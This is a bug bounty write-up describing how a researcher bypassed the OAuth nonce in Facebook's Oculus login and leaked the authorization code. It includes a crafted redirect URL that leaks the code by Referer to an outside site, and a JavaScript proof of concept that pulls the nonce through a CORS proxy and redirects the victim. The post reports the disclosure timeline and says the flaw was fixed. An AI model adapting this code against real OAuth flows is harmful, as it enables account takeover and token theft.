Bypass OAuth nonce and steal oculus response code
This post is about an bug that i found on Facebook Oculus Application OAuth which could have been used to bypass nonce and steal response_code
Recently Facebook made a Oauth login Feature for Oculus. that means the user can directly login to oculus using facebook account.but there is a nonce parameter in the URL. that i never seen in any other Oauth flow. so i started to dig deeper on it.
OAuth Authorisation URL for Facebook Oculus :
Request :
https://www.facebook.com/v2.8/dialog/oauth?app_id=1517832211847102&client_id=1517832211847102&domain=auth.oculus.com&locale=en_GB&origin=1&redirect_uri=https://auth.oculus.com/login/&response_type=code&sdk=joey&version=v2.8&nonce=AXRr8eBAjDTBkzQ7&state=d916afa3-3dc1-bab7-fc9d-3c8f44bf757Response :
https://auth.oculus.com/login/?code=AQDtxcP7I--AWqEvE-LjcPIjkimy7Z-oQHvLMtGNB8sdKSqhvvv5KFO1KNXgPw4nEewmFsOKsq1GIAcEqJq09rLHlsGQVBxq-HwqbvlE-_unfTayj2HdGp5GGEqsNLlK2zerCpKbBHbiDRW4tr7ZBnxcgebywDbd,lonbrqie5fdwjD-x6jsnI5wnZ4XaDIRMixFoRqtQSne406BwOo2nSVS2o1MmmXkLW_zaW5Vy0SW6&state=d916afa3-3dc1-bab8-fc9d-3c8f44bfe7b7#_=_The nonce act as CSRF token to prevent the user from CSRF attack.if the nonce value is not matched the Oauth request will get aborted . and does not follow the redirect_url.
In this Oauth flow i had two challenges :
1. Bypass nonce
2. Bypass redirect_url
Bypassing nonce is not that much easy. but i decided to make a try . after some testing i came to know nothing (Zero Progress).
when i Googled came to know about CORS Proxy. it is a free service for developers who need to bypass same-origin policy related to performing standard AJAX requests to 3rd party services.
There are some online Proxy servers:
when i passed the Oauth url in this proxy server it respond the source code of the given URL. when i searched for nonce in the source code can’t believe that both of the nonce value in real request and using this cors request are same.
So i bypassed the nonce now its time to bypass redirect url. then i started to explore but it made easy than i think.the below URL redirect the Response_code to my app domain using Referer leakage .
https://auth.oculus.com/login/?redirect_uri=https://www.facebook.com/dialog/send?client_id=1933886253534366&next=https://www.whatismyreferer.com&from_post=1&error_ok=OKNow i Bypassed the both nonce and redirect_url . but to reproduce this all process with one click a CSRF POC to be created.
The Below code first make a cors request and get the nonce value in source code.finally combines the final_url + nonce in window.location and make a request.
var Cors_URL = "https://crossorigin.me/https://www.facebook.com/v2.8/dialog/oauth?app_id=1517832211847102&redirect_uri=https://auth.oculus.com/login/&response_type=code";
var Final_url = "https://www.facebook.com/v2.8/dialog/oauth?app_id=1517832211847102&response_type=code&redirect_uri=https://auth.oculus.com/login/?redirect_uri=https://www.facebook.com/dialog/send?client_id=1933886253534366%2526next%253Dhttps://www.whatismyreferer.com%2526from_post%253D1%2526error_ok%253DOK&nonce=";
var xhttp = new XMLHttpRequest();
xhttp.open("GET", Cors_URL , true);
xhttp.send();
xhttp.onload = function() {
var str = xhttp.response.split("nonce=")[1];
var nonce = str.split("&")[0];
if (nonce.length == 0){
alert("Sorry! nonce not found..");
}
else {
alert("nonce : " + nonce);
Final_url = Final_url + nonce ;
window.location = Final_url ;
}
};
xhttp.onerror = function() {
alert("Please try again.");
};Video POC:
To reproduce this bug the victim should be logged in both Facebook and oculus .because redirect_uri works only when the user is logged into his oculus account.
The Fix:
The leakage of nonce value in CORS Proxy and the redirect_uri in oculus to Facebook was fixed.
Timeline:
30-June-2017 : Report Sent
6-July-2017 : Facebook response that not able to reproduce the issue
6-July-2017 : Additional details provided by me
1-August-2017 : Further investigation by Facebook
10-August-2017: Fixed by Facebook
14-August-2017 : $10,000 bounty awarded by Facebook
